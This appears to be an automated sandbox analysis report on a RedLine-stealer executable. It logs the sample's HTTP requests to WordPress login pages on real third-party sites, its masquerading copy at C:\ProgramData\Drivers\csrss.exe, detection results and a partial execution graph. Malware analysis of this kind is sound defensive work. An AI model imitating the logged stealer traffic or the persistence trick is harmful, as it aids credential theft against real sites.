                                                                                                                                                                                                    2023-11-26 06:00:08 UTC536INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 06:00:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    628192.168.2.458366120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC948OUTGET /saml/index.php?page=%2Fwp-admin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJLj9sgFIX3%2BRUj740xzmOMkkjppI9IaRJN0i66qa7heoKEwQN42vz7OmaqaSs1LA%2F3Ozr3wNxDo1u%2B6sLZPOJzhz6M7vrzs9HG8%2BFykXTOcAteeW6gQc%2BD4MfV5y1nhPLW2WCF1ck%2F2G0KvEcXlDUR26wXyX73frv%2FuNl9L%2BsCZ6xiMygKEILeU5nXVT6dVZJhIRkUk0kNExnRr%2Bh877NIettkFN2873BjfAATep2yIs3zlE1PdMop5ZR9i%2Bi6X1YZCAN%2BDqH1PMu0fVKGNEo4620drNHKIBG2ycR9PS7KCaY1jDEd5%2BU0BVmVaQVMSCaAljXNrquzaH94beadMlKZp9uFVHHI80%2Bn0yE97I%2BnaLL6XdSDNb5r0B3RvSiBXx63b5mbCxGgX8BdyLOWBGVHoBuiZCJipD23yXJwnF91PnTkljcd5tmfo29wy3d9%2Fs36YLUSl0G%2Fng%2FWNRD%2Bv2ZO8kFRMq2HUd4Z36JQtcLXxxw21tr%2BeHAIARdJcB0md9lyFLP8%2FVGXvwA%3D&RelayState=%2Fwp-login.php
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC1089INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    629192.168.2.459179144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC496INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:08 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC7696INData Raw: 32 61 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 2ae7<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC3293INData Raw: 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 2d 6d 65 74 65 72 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 70 77 73 4c 31 30 6e 20 3d 20 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 46 6f 72 74 61 6c 65 7a 61 20 64 65 20 63 6f 6e 74 72 61 73 65 5c 75 30 30 66 31 61 20 64 65 73 63 6f 6e 6f 63 69 64 61 22 2c 22 73 68 6f 72 74 22 3a 22 4d 75 79 20 64 5c 75 30 30 65 39 62 69 6c 22 2c 22 62 61 64 22 3a 22 44 5c 75 30 30 65 39 62 69 6c 22 2c 22 67 6f 6f 64 22 3a 22 4d 65 64 69 6f 22 2c 22 73 74 72 6f 6e 67 22 3a 22 46 75 65 72 74 65 22 2c 22 6d 69 73 6d 61 74 63 68 22 3a 22 4e 6f 20 63 6f 69 6e 63 69 64 65 6e 22 7d 3b 0a 2f 2a 20 5d 5d 3e
                                                                                                                                                                                                    Data Ascii: pe="text/javascript" id="password-strength-meter-js-extra">/* <![CDATA[ */var pwsL10n = {"unknown":"Fortaleza de contrase\u00f1a desconocida","short":"Muy d\u00e9bil","bad":"D\u00e9bil","good":"Medio","strong":"Fuerte","mismatch":"No coinciden"};/* ...
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:06:58:42
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'973'248 bytes
                                                                                                                                                                                                    MD5 hash:FE049DDD0FFD2DF34DA564208AFF9CEC
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                    Start time:06:58:48
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'973'248 bytes
                                                                                                                                                                                                    MD5 hash:FE049DDD0FFD2DF34DA564208AFF9CEC
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:06:58:57
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'973'248 bytes
                                                                                                                                                                                                    MD5 hash:FE049DDD0FFD2DF34DA564208AFF9CEC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 70%, ReversingLabs
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:06:59:06
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'973'248 bytes
                                                                                                                                                                                                    MD5 hash:FE049DDD0FFD2DF34DA564208AFF9CEC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:06:59:45
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 5984
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:07:00:07
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 25500
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                    Start time:07:00:48
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38276
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:07:00:48
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 260
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:07:00:48
                                                                                                                                                                                                    Start date:26/11/2023
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38328
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:8%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:12.5%
                                                                                                                                                                                                      Signature Coverage:3.8%
                                                                                                                                                                                                      Total number of Nodes:1626
                                                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                                                      execution_graph 7929 406056 7930 406067 7929->7930 7966 40ba8b HeapCreate 7930->7966 7933 4060a6 7968 40a6b5 GetModuleHandleW 7933->7968 7937 4060b7 __RTC_Initialize 8002 409326 7937->8002 7938 405ffe _fast_error_exit 67 API calls 7938->7937 7940 4060c5 7941 4060d1 GetCommandLineA 7940->7941 8108 405c76 7940->8108 8017 40b954 7941->8017 7948 4060f6 8053 40b621 7948->8053 7949 405c76 __amsg_exit 67 API calls 7949->7948 7952 406107 8068 405d35 7952->8068 7953 405c76 __amsg_exit 67 API calls 7953->7952 7955 40610e 7956 406119 7955->7956 7957 405c76 __amsg_exit 67 API calls 7955->7957 8074 40b5c2 7956->8074 7957->7956 7962 406148 8118 405f12 7962->8118 7965 40614d _puts 7967 40609a 7966->7967 7967->7933 8100 405ffe 7967->8100 7969 40a6d0 7968->7969 7970 40a6c9 7968->7970 7972 40a838 7969->7972 7973 40a6da GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7969->7973 8121 405c46 7970->8121 8180 40a3cf 7972->8180 7975 40a723 TlsAlloc 7973->7975 7977 4060ac 7975->7977 7979 40a771 TlsSetValue 7975->7979 7977->7937 7977->7938 7979->7977 7980 40a782 7979->7980 8125 405f30 7980->8125 7985 40a2a5 __encode_pointer 6 API calls 7986 40a7a2 7985->7986 7987 40a2a5 __encode_pointer 6 API calls 7986->7987 7988 40a7b2 7987->7988 7989 40a2a5 __encode_pointer 6 API calls 7988->7989 7990 40a7c2 7989->7990 8142 40aea5 7990->8142 7997 40a320 __decode_pointer 6 API calls 7998 40a816 7997->7998 7998->7972 7999 40a81d 7998->7999 8162 40a40c 7999->8162 8001 40a825 GetCurrentThreadId 8001->7977 8513 4095ac 8002->8513 8004 409332 GetStartupInfoA 8005 40be13 __calloc_crt 67 API calls 8004->8005 8006 409353 8005->8006 8007 409571 _puts 8006->8007 8008 4094b8 8006->8008 8011 40be13 __calloc_crt 67 API calls 8006->8011 8016 40943b 8006->8016 8007->7940 8008->8007 8009 4094ee GetStdHandle 8008->8009 8010 409553 SetHandleCount 8008->8010 8012 409500 GetFileType 8008->8012 8014 40b4db ___lock_fhandle InitializeCriticalSectionAndSpinCount 8008->8014 8009->8008 8010->8007 8011->8006 8012->8008 8013 409464 GetFileType 8013->8016 8014->8008 8015 40b4db ___lock_fhandle InitializeCriticalSectionAndSpinCount 8015->8016 8016->8007 8016->8008 8016->8013 8016->8015 8018 40b991 8017->8018 8019 40b972 GetEnvironmentStringsW 8017->8019 8021 40b97a 8018->8021 8022 40ba2a 8018->8022 8020 40b986 GetLastError 8019->8020 8019->8021 8020->8018 8023 40b9bc WideCharToMultiByte 8021->8023 8024 40b9ad GetEnvironmentStringsW 8021->8024 8025 40ba33 GetEnvironmentStrings 8022->8025 8026 4060e1 8022->8026 8028 40b9f0 8023->8028 8029 40ba1f FreeEnvironmentStringsW 8023->8029 8024->8023 8024->8026 8025->8026 8030 40ba43 8025->8030 8042 40b899 8026->8042 8032 40bdce __malloc_crt 67 API calls 8028->8032 8029->8026 8031 40bdce __malloc_crt 67 API calls 8030->8031 8033 40ba5d 8031->8033 8034 40b9f6 8032->8034 8035 40ba70 ___crtGetEnvironmentStringsA 8033->8035 8036 40ba64 FreeEnvironmentStringsA 8033->8036 8034->8029 8037 40b9fe WideCharToMultiByte 8034->8037 8040 40ba7a FreeEnvironmentStringsA 8035->8040 8036->8026 8038 40ba10 8037->8038 8039 40ba18 8037->8039 8041 407ece ___convertcp 67 API calls 8038->8041 8039->8029 8040->8026 8041->8039 8043 40b8b3 GetModuleFileNameA 8042->8043 8044 40b8ae 8042->8044 8046 40b8da 8043->8046 8520 40ee40 8044->8520 8514 40b6ff 8046->8514 8048 4060eb 8048->7948 8048->7949 8050 40bdce __malloc_crt 67 API calls 8051 40b91c 8050->8051 8051->8048 8052 40b6ff _parse_cmdline 77 API calls 8051->8052 8052->8048 8054 40b62a 8053->8054 8056 40b62f _strlen 8053->8056 8055 40ee40 ___initmbctable 111 API calls 8054->8055 8055->8056 8057 40be13 __calloc_crt 67 API calls 8056->8057 8060 4060fc 8056->8060 8063 40b664 _strlen 8057->8063 8058 40b6c2 8059 407ece ___convertcp 67 API calls 8058->8059 8059->8060 8060->7952 8060->7953 8061 40be13 __calloc_crt 67 API calls 8061->8063 8062 40b6e8 8064 407ece ___convertcp 67 API calls 8062->8064 8063->8058 8063->8060 8063->8061 8063->8062 8065 407d4d _strcpy_s 67 API calls 8063->8065 8066 40b6a9 8063->8066 8064->8060 8065->8063 8066->8063 8067 407b74 __invoke_watson 10 API calls 8066->8067 8067->8066 8070 405d43 __IsNonwritableInCurrentImage 8068->8070 8931 40b1de 8070->8931 8071 405d61 __initterm_e 8073 405d80 __IsNonwritableInCurrentImage __initterm 8071->8073 8935 40b17b 8071->8935 8073->7955 8075 40b5d0 8074->8075 8076 40b5d5 8074->8076 8077 40ee40 ___initmbctable 111 API calls 8075->8077 8078 40611f 8076->8078 8079 40f76c _parse_cmdline 77 API calls 8076->8079 8077->8076 8080 4043a4 8078->8080 8079->8076 8081 4043ba CharToOemBuffA GetMessageExtraInfo GetCharWidth32A GetCharABCWidthsFloatW 8080->8081 8081->8081 8082 4043e4 8081->8082 8083 4043eb GetLastError GetNamedPipeInfo 8082->8083 8084 404413 8082->8084 8083->8082 8085 40441f GetConsoleAliasExesLengthA 8084->8085 8099 40445f 8084->8099 9071 4056a7 8085->9071 8088 40442c 9078 403dfc 8088->9078 8089 40447c GlobalFindAtomW 8090 40447a 8089->8090 8090->8089 8091 40449e 8090->8091 8094 4044af GetPrivateProfileStringA 8091->8094 8095 4044d2 8091->8095 8093 404448 9081 405983 8093->9081 8094->8091 8095->7962 8115 405ee6 8095->8115 8097 404457 9102 40559b 8097->9102 9035 4041c0 8099->9035 8101 406011 8100->8101 8102 40600c 8100->8102 8103 40761c __NMSG_WRITE 67 API calls 8101->8103 8104 4077c7 __FF_MSGBANNER 67 API calls 8102->8104 8105 406019 8103->8105 8104->8101 8106 405cca _doexit 3 API calls 8105->8106 8107 406023 8106->8107 8107->7933 8109 4077c7 __FF_MSGBANNER 67 API calls 8108->8109 8110 405c80 8109->8110 8111 40761c __NMSG_WRITE 67 API calls 8110->8111 8112 405c88 8111->8112 8113 40a320 __decode_pointer 6 API calls 8112->8113 8114 405c93 8113->8114 8114->7941 8116 405dba _doexit 67 API calls 8115->8116 8117 405ef7 8116->8117 8117->7962 8119 405dba _doexit 67 API calls 8118->8119 8120 405f1d 8119->8120 8120->7965 8122 405c51 Sleep GetModuleHandleW 8121->8122 8123 405c73 8122->8123 8124 405c6f 8122->8124 8123->7969 8124->8122 8124->8123 8191 40a317 8125->8191 8127 405f38 __init_pointers __initp_misc_winsig 8194 405972 8127->8194 8130 40a2a5 __encode_pointer 6 API calls 8131 405f74 8130->8131 8132 40a2a5 TlsGetValue 8131->8132 8133 40a2bd 8132->8133 8134 40a2de GetModuleHandleW 8132->8134 8133->8134 8137 40a2c7 TlsGetValue 8133->8137 8135 40a2f9 GetProcAddress 8134->8135 8136 40a2ee 8134->8136 8139 40a2d6 8135->8139 8138 405c46 __crt_waiting_on_module_handle 2 API calls 8136->8138 8140 40a2d2 8137->8140 8141 40a2f4 8138->8141 8139->7985 8140->8134 8140->8139 8141->8135 8141->8139 8144 40aeb0 8142->8144 8145 40a7cf 8144->8145 8197 40b4db 8144->8197 8145->7972 8146 40a320 TlsGetValue 8145->8146 8147 40a338 8146->8147 8148 40a359 GetModuleHandleW 8146->8148 8147->8148 8151 40a342 TlsGetValue 8147->8151 8149 40a374 GetProcAddress 8148->8149 8150 40a369 8148->8150 8155 40a351 8149->8155 8152 405c46 __crt_waiting_on_module_handle 2 API calls 8150->8152 8154 40a34d 8151->8154 8153 40a36f 8152->8153 8153->8149 8153->8155 8154->8148 8154->8155 8155->7972 8156 40be13 8155->8156 8158 40be1c 8156->8158 8159 40a7fc 8158->8159 8160 40be3a Sleep 8158->8160 8202 40979c 8158->8202 8159->7972 8159->7997 8161 40be4f 8160->8161 8161->8158 8161->8159 8492 4095ac 8162->8492 8164 40a418 GetModuleHandleW 8165 40a428 8164->8165 8166 40a42e 8164->8166 8167 405c46 __crt_waiting_on_module_handle 2 API calls 8165->8167 8168 40a446 GetProcAddress GetProcAddress 8166->8168 8169 40a46a 8166->8169 8167->8166 8168->8169 8170 40b021 __lock 63 API calls 8169->8170 8171 40a489 InterlockedIncrement 8170->8171 8493 40a4e1 8171->8493 8174 40b021 __lock 63 API calls 8175 40a4aa 8174->8175 8496 40efa7 InterlockedIncrement 8175->8496 8177 40a4c8 8508 40a4ea 8177->8508 8179 40a4d5 _puts 8179->8001 8181 40a3d9 8180->8181 8182 40a3e5 8180->8182 8184 40a320 __decode_pointer 6 API calls 8181->8184 8183 40a3f9 TlsFree 8182->8183 8185 40a407 8182->8185 8183->8185 8184->8182 8186 40af0c DeleteCriticalSection 8185->8186 8187 40af24 8185->8187 8188 407ece ___convertcp 67 API calls 8186->8188 8189 40af36 DeleteCriticalSection 8187->8189 8190 40af44 8187->8190 8188->8185 8189->8187 8190->7977 8192 40a2a5 __encode_pointer 6 API calls 8191->8192 8193 40a31e 8192->8193 8193->8127 8195 40a2a5 __encode_pointer 6 API calls 8194->8195 8196 40597c 8195->8196 8196->8130 8201 4095ac 8197->8201 8199 40b4e7 InitializeCriticalSectionAndSpinCount 8200 40b52b _puts 8199->8200 8200->8144 8201->8199 8203 4097a8 _puts 8202->8203 8204 4097c0 8203->8204 8214 4097df _memset 8203->8214 8215 407d04 8204->8215 8208 409851 RtlAllocateHeap 8208->8214 8209 4097d5 _puts 8209->8158 8214->8208 8214->8209 8221 40b021 8214->8221 8228 40cadb 8214->8228 8234 409898 8214->8234 8237 40b54a 8214->8237 8240 40a4f3 GetLastError 8215->8240 8217 407d09 8218 407c9c 8217->8218 8219 40a320 __decode_pointer 6 API calls 8218->8219 8220 407cac __invoke_watson 8219->8220 8222 40b036 8221->8222 8223 40b049 EnterCriticalSection 8221->8223 8287 40af5e 8222->8287 8223->8214 8225 